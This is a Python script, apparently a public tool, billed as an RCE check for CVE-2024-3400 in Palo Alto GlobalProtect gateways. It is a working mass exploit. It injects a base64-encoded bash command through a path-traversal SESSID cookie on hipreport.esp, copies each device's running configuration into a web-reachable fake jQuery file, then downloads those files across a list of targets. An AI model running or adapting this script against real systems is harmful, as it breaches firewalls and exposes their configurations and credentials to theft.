CVE-2024-3400-RCE-CHECK.py

import argparse
import base64
import random
import string
import time
from concurrent.futures import ThreadPoolExecutor, wait
import urllib3
import requests

urllib3.disable_warnings()

def GenerateRandomString(length):
    characters = string.ascii_lowercase + string.digits
    return ''.join(random.choice(characters) for _ in range(length))

maybeRceFile = open("mayberce.txt", "w", encoding="utf-8")
yesRceFile = open("yesRce.txt", "w", encoding="utf-8")

def CreateTarFile(url, proxy):
    try:
        filename = GenerateRandomString(10)
        cmd = f"tar -czf /var/appweb/sslvpndocs/global-protect/portal/js/jquery.{filename}.js /opt/pancfg/mgmt/saved-configs/running-config.xml"
        base64_cmd = base64.b64encode(cmd.encode()).decode().rstrip("=")
        headers = {
            "Cookie": "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/`echo${IFS}" + base64_cmd + "|base64${IFS}-d|bash${IFS}-i`",
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
        }
        resp = requests.post(url=url + "/ssl-vpn/hipreport.esp", headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
        if resp.status_code == 200:
            maybeRceFile.write(f"{url}/global-protect/portal/js/jquery.{filename}.js\n")
        else:
            pass
    except:
        pass

def CheckTarFile(url, proxy):
    try:
        headers = {
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
        }
        resp = requests.get(url=url, headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
        if resp.status_code == 200:
            print(f"[+] Can be RCE: {url}")
            yesRceFile.write(f"{url}\n")
        else:
            pass
            # print(f"[-] No vulnerability: {url}")
    except:
        return False

def GetUrls(urlFileName):
    remove_duplicates_urls = []
    with open(urlFileName, "r") as f:
        for address in f.readlines():
            address = address.strip()
            remove_duplicates_urls.append(address.replace("https://", "").replace("http://", ""))
        remove_duplicates_urls = set(remove_duplicates_urls)
        for url in remove_duplicates_urls:
            yield "https://" + url

def ThreadCreateTarFile(file2check, proxy, max_thread_num):
    urlAddrs = GetUrls(file2check)
    executor = ThreadPoolExecutor(max_workers=max_thread_num)
    futures = []
    for addr in urlAddrs:
        future = executor.submit(CreateTarFile, addr, proxy)
        futures.append(future)
    wait(futures)

def ThreadCheckTarFile(proxy, max_thread_num):
    urlAddrs = GetUrls("mayberce.txt")
    executor = ThreadPoolExecutor(max_workers=max_thread_num)
    futures = []
    for addr in urlAddrs:
        future = executor.submit(CheckTarFile, addr, proxy)
        futures.append(future)
    wait(futures)

def ParseArgs():
    parser = argparse.ArgumentParser(description="CVE-2024-3400-RCE-CHECK")
    parser.add_argument("-p", "--proxy", type=str, default="http://127.0.0.1:8083", help="proxy url, eg: http://127.0.0.1:8083", required=False)
    parser.add_argument("-f", "--file", type=str, help="target urls to check, eg: urls.txt", required=True)
    parser.add_argument("-t", "--thread", type=int, default=100, help="threads to scan", required=False)
    return parser.parse_args()

if __name__ == "__main__":
    args = ParseArgs()
    if not args.proxy:
        proxy = {}
    else:
        proxy = {
            "http": args.proxy,
            "https": args.proxy
        }
    ThreadCreateTarFile(args.file, proxy, args.thread)
    time.sleep(320)
    ThreadCheckTarFile(proxy, args.thread)